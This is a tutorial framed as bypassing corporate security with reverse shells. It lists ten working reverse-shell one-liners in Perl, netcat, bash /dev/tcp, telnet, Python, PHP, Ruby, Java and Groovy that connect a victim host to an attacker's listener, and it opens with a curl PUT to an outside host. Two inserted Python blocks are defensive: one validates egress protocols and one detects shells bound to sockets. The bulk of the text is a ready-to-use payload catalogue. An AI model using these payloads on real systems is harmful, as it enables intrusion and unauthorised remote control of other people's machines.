Bypass corporate security with a reverse shell

cat << EOF | curl -X PUT -d @- uberleet.org


A reverse shell is where an attacker opens a listening socket on a ‘control machine’ on a remote port, then waits for a connection. A compromised machine is then instructed to connect to that control port, invoke BASH, and await commands from the control host.

This is damaging because the hacked host can sit behind a firewall and contact a controller at any time without your knowledge. This can be mitigated by egress firewalls and IDS, but ports 80, 443 and 53 are usually open, so an IDS will have to do packet inspection to validate that the traffic on those ports actually conforms to the protocol spec.
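The "validate that the protocol meets spec" part is the bit people skip, so here is a sketch of what it looks like in practice. This is an added example and not code from the original post: it takes the first bytes an internal host sends on an allowed egress port and checks that they look like an HTTP request line, a TLS ClientHello record, or a DNS query header, and treats every other port as default-deny. The sample flows are constructed, and the port-to-validator mapping is an assumption about which three ports your egress policy leaves open.

```python
"""Egress protocol validation for the ports that are usually open (80, 443, 53).
Added example; not code from the original post. The sample flows are constructed."""
import struct

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS ",
                b"DELETE ", b"CONNECT ", b"PATCH ")

def looks_like_http_request(first_bytes):
    """Port 80: first line must be '<METHOD> <target> HTTP/1.x'."""
    if not first_bytes.startswith(HTTP_METHODS):
        return False
    end = first_bytes.find(b"\r\n")
    request_line = first_bytes if end == -1 else first_bytes[:end]
    parts = request_line.split(b" ")
    return len(parts) == 3 and parts[2].startswith(b"HTTP/1.")

def looks_like_tls_client_hello(first_bytes):
    """Port 443: TLS record of type handshake (0x16), version 3.x, carrying a ClientHello (0x01)."""
    if len(first_bytes) < 6:
        return False
    ctype, vmaj, vmin = first_bytes[0], first_bytes[1], first_bytes[2]
    rlen = struct.unpack("!H", first_bytes[3:5])[0]
    if ctype != 0x16 or vmaj != 0x03 or vmin not in (0x01, 0x02, 0x03):
        return False
    return 0 < rlen <= 16384 and first_bytes[5] == 0x01

def looks_like_dns_query(first_bytes):
    """Port 53: 12-byte header with QR=0, opcode 0, at least one question and no answers."""
    if len(first_bytes) < 12:
        return False
    _ident, flags, qdcount, ancount, nscount, _arcount = struct.unpack("!HHHHHH", first_bytes[:12])
    if flags & 0x8000 or (flags >> 11) & 0xF:
        return False
    return qdcount >= 1 and ancount == 0 and nscount == 0

# Assumption: these are the only three ports the egress policy leaves open.
VALIDATORS = {80: looks_like_http_request, 443: looks_like_tls_client_hello, 53: looks_like_dns_query}

def classify_egress(dst_port, first_bytes):
    """Default-deny: only 80/443/53 may leave, and only if the first client bytes match the protocol."""
    check = VALIDATORS.get(dst_port)
    if check is None:
        return "block-port"
    return "allow" if check(first_bytes) else "alert-protocol-mismatch"

# Constructed sample flows: (flow id, destination port, first bytes sent by the internal host)
SAMPLE_FLOWS = [
    ("browser-tls", 443, b"\x16\x03\x01\x00\xc5\x01\x00\x00\xc1\x03\x03" + b"\x00" * 32),
    ("browser-http", 80, b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    ("resolver", 53, b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
                     b"\x07example\x03com\x00\x00\x01\x00\x01"),
    ("odd-443", 443, b"sh: no job control in this shell\nsh-4.4$ "),   # a prompt, not a ClientHello
    ("odd-80", 80, b"uid=1000(www-data) gid=1000(www-data)\n"),      # command output, not a request
    ("odd-53", 53, b""),                                             # connected but sent nothing
    ("raw-8888", 8888, b"anything"),                                 # port not in the allow-list
]

def triage(flows):
    """Return {flow id: verdict} for a batch of flows."""
    return {fid: classify_egress(port, data) for fid, port, data in flows}

if __name__ == "__main__":
    for fid, verdict in triage(SAMPLE_FLOWS).items():
        print(f"{fid:14s} {verdict}")
```

Two caveats worth knowing before you rely on this. First, it only catches shells that speak raw over the open port; anything wrapped in real TLS passes the record-level check, so the next step on 443 is SNI/certificate allow-listing or a TLS-terminating proxy, and on 53 it is volume and name-entropy checks on the queries. Second, an interactive `sh -i` writes its prompt to the socket, which is why the client side has bytes to inspect at all; a connection that sends nothing for a long time on 443 is itself worth a timeout-based alert rather than a pass.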

Here are 9 drastically different ways to do this, employing our friend BASH and pipe redirection.

1) Perl reverse shell

Perl is a good example as it’s been on every machine I’ve seen for the last 20 years.

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

This example takes STDIN, STDOUT and STDERR from /bin/sh and maps them to the socket.

Start the shell on your victim host

perl -e 'use Socket;$i="192.168.0.20";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

2) netcat reverse shell ("hardened" openbsd version)

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

Now you create a FIFO and use it as a backpipe: netcat’s output is piped into /bin/bash, and bash’s stdout is written to the FIFO, which netcat reads and relays back to the controlling host.

On your victim/target host start the shell

mknod fifodev p && nc 192.168.0.20 8888 0<fifodev | /bin/bash 1>fifodev

or

mkfifo fifodev && nc 192.168.0.20 8888 0<fifodev | /bin/bash 1>fifodev

3) netcat reverse shell (traditional version)

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

Start the shell on your victim host

nc 192.168.0.20 8888 -e /bin/bash

4) /dev/tcp + bash reverse shell

/dev/tcp/host/port is a pseudo-path that bash itself handles in redirections (no such file exists on disk), which lets you open arbitrary TCP sockets from bash. This example pipes an interactive shell to your control host.

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

Start the shell on your victim host

/bin/bash -i > /dev/tcp/192.168.0.20/8888 0<&1 2>&1

5) Double telnet reverse shell

This approach uses two netcat listeners on the control host and needs only bash and telnet on your victim host. Specifically, it pipes input from one control session (port 2222) into /bin/bash and pipes the output to the second control session (port 1111).

On your control host create two shells running these two listeners

nc -n -vv -l -p 1111
# stdout shell ^
nc -n -vv -l -p 2222
# stdin shell ^

On your victim/target host start the shell

telnet 192.168.0.20 2222 | /bin/bash | telnet 192.168.0.20 1111

6) Python reverse shell

This imports socket and uses subprocess to call a subshell, and manages the subshell’s stdin/stdout through the socket.

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

This example duplicates the socket onto the file descriptors for STDIN, STDOUT and STDERR using os.dup2, so /bin/sh inherits them.

Start the shell on your victim host

# Python 2.7 tested
python -c 'import socket,subprocess,os;x=socket.socket(socket.AF_INET,socket.SOCK_STREAM);x.connect(("192.168.0.20",8888));os.dup2(x.fileno(),0); os.dup2(x.fileno(),1); os.dup2(x.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

7) PHP reverse shell

Of course any exploit wouldn’t feel at home without PHP involved.

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

This example redirects STDIN (<&3), STDOUT (>&3) and STDERR (2>&3) onto the socket returned by fsockopen().

Start the shell on your victim host

# PHP 5.5 tested
php -r '$sock=fsockopen("192.168.0.20",8888);exec("/bin/sh -i <&3 >&3 2>&3");'

8) Ruby reverse shell

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

This example redirects STDIN (<&%d), STDOUT (>&%d) and STDERR (2>&%d) onto the socket returned by TCPSocket.open.

Start the shell on your victim host

# Ruby 1.9.3 tested
ruby -rsocket -e'f=TCPSocket.open("192.168.0.20",8888).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

9) Java reverse shell

You probably don’t want to see this in production.

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

Put this code in your java execution

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.20/8888;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

10) Groovy reverse shell

You probably don’t want to see this in production.

On your control host, start listening for a reverse shell connection

nc -n -vv -l -p 8888

Put this code in your java execution

String host="192.168.0.20";
int port=8888;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
EOF
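Whatever the language, every variant above leaves the same fingerprint on the victim host: a shell or interpreter whose file descriptors 0/1/2 point at a TCP socket (variants 1, 3, 4, 6, 7, 8, 9, 10), or an nc/telnet whose stdin/stdout is a pipe or FIFO feeding a shell (variants 2 and 5). That is what you hunt for on the host side. The following is an added example, not code from the original post: it parses a /proc/net/tcp excerpt to map socket inodes to remote endpoints, then scores processes by what their stdio links point at. The process list and the /proc/net/tcp excerpt are constructed, and collect_live_procs() is a hypothetical best-effort collector for running it against a real Linux box.

```python
"""Host-side hunt for the fingerprint all the variants above share: a shell or
interpreter whose stdio is a TCP socket, or nc/telnet wired to a pipe/FIFO.
Added example, not code from the original post; the process list and the
/proc/net/tcp excerpt below are constructed."""
import os
import re

SHELLS = {"sh", "bash", "dash", "zsh", "perl", "python", "python2", "python3",
          "php", "ruby", "java"}
RELAYS = {"nc", "ncat", "netcat", "telnet"}
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")

def _is_tty(link):
    return link.startswith("/dev/pts/") or link.startswith("/dev/tty")

def _hex_addr(field):
    """'1400A8C0:22B8' (little-endian hex, as in /proc/net/tcp on x86) -> ('192.168.0.20', 8888)."""
    ip_hex, port_hex = field.split(":")
    ip = ".".join(str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0))
    return ip, int(port_hex, 16)

def parse_proc_net_tcp(text):
    """Map socket inode -> remote endpoint for ESTABLISHED (st == 01) sockets."""
    established = {}
    for line in text.splitlines()[1:]:          # skip the header line
        f = line.split()
        if len(f) >= 10 and f[3] == "01":
            established[int(f[9])] = _hex_addr(f[2])
    return established

def find_suspicious_stdio(procs, established):
    """procs: [{'pid', 'comm', 'fds': {0: link, 1: link, 2: link}}], links as read from /proc/<pid>/fd."""
    findings = []
    for p in procs:
        comm, fds = p["comm"], p["fds"]
        inodes = [int(m.group(1)) for m in map(SOCKET_RE.match, fds.values()) if m]
        if comm in SHELLS and inodes:
            # High confidence: a shell reading commands straight from a TCP socket.
            remote = next((established[i] for i in inodes if i in established), None)
            findings.append({"pid": p["pid"], "comm": comm, "severity": "high",
                             "reason": "shell stdio bound to a TCP socket", "remote": remote})
        elif comm in RELAYS and any(
                not _is_tty(fds[fd]) and fds[fd] != "/dev/null" and not SOCKET_RE.match(fds[fd])
                for fd in (0, 1) if fd in fds):
            # Medium: nc/telnet with stdin or stdout on a pipe or FIFO instead of a terminal.
            findings.append({"pid": p["pid"], "comm": comm, "severity": "medium",
                             "reason": "network relay with pipe/FIFO stdio", "remote": None})
    return findings

def collect_live_procs():
    """Hypothetical best-effort collector: reads comm and fd 0/1/2 links from /proc on Linux."""
    procs = []
    if not os.path.isdir("/proc"):
        return procs
    for pid in (d for d in os.listdir("/proc") if d.isdigit()):
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            fds = {fd: os.readlink(f"/proc/{pid}/fd/{fd}") for fd in (0, 1, 2)}
        except OSError:                          # process gone, or not ours to inspect
            continue
        procs.append({"pid": int(pid), "comm": comm, "fds": fds})
    return procs

# Constructed snapshot: one established socket from 192.168.0.11 to 192.168.0.20:8888, one listener.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0B00A8C0:B3C4 1400A8C0:22B8 01 00000000:00000000 00:00000000 00000000  1000        0 31337 1 0000000000000000 20 4 30 10 -1
   1: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 22222 1 0000000000000000 100 0 0 10 0
"""
SAMPLE_PROCS = [
    {"pid": 4242, "comm": "sh", "fds": {0: "socket:[31337]", 1: "socket:[31337]", 2: "socket:[31337]"}},
    {"pid": 1001, "comm": "bash", "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    {"pid": 5150, "comm": "telnet", "fds": {0: "/dev/pts/1", 1: "pipe:[900]", 2: "/dev/pts/1"}},
    {"pid": 777, "comm": "nc", "fds": {0: "/tmp/fifodev", 1: "pipe:[901]", 2: "/dev/pts/1"}},
    {"pid": 2100, "comm": "nc", "fds": {0: "/dev/null", 1: "/dev/pts/3", 2: "/dev/pts/3"}},
]

if __name__ == "__main__":
    hits = find_suspicious_stdio(SAMPLE_PROCS, parse_proc_net_tcp(SAMPLE_PROC_NET_TCP))
    for h in hits:
        print(h)
```

On a real host, `comm` is truncated to 15 characters and carries the version suffix (for example python2.7), so match on a prefix rather than the exact set used here, and read the /proc/net/tcp6 table as well. The "high" rule needs no allow-list at all; an interactive shell with a socket on fd 0 has essentially no legitimate reason to exist on a server, which is what makes it such a cheap and reliable detection for everything in this post.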
